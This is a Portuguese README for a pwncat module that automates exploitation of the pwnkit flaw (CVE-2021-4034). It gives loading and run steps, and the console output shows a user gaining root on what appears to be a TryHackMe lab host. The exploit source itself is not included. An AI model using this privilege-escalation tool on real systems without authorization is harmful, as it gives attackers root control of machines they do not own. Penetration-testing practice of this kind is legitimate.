
módulo pwncat que explora automaticamente o CVE-2021-4034 (pwnkit)
O objetivo deste módulo é tentar explorar o CVE-2021-4034 (pwnkit) em um alvo ao usar o pwncat.
Não é necessário configurar diretórios, compilar qualquer código-fonte ou até mesmo ter gcc no alvo remoto; o módulo pwnkit cuida disso automaticamente usando o framework pwncat.
pwnkit.py para algum lugar no seu host onde o pwncat-cs esteja instalado. Ex.: /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit. Você deve ver algo assim:(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit. Se for bem-sucedido, você deve ver o UID mudar para 0, e agora ser root. Ex.:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load sempre, pode fazer o pwncat carregar este módulo automaticamente na inicialização colocando-o em ~/.local/share/pwncat/modules# Set the gcc path
set cross "/usr/bin/gcc"
Um agradecimento especial ao Caleb Stewart por ser prestativo enquanto eu avançava no aprendizado do framework pwncat sob uma perspectiva de desenvolvedor. Vou fazer um pull request para colocar isso no módulo principal de escalonamento do pwncat algum dia quando tiver tempo livre... Eu prometo. :-)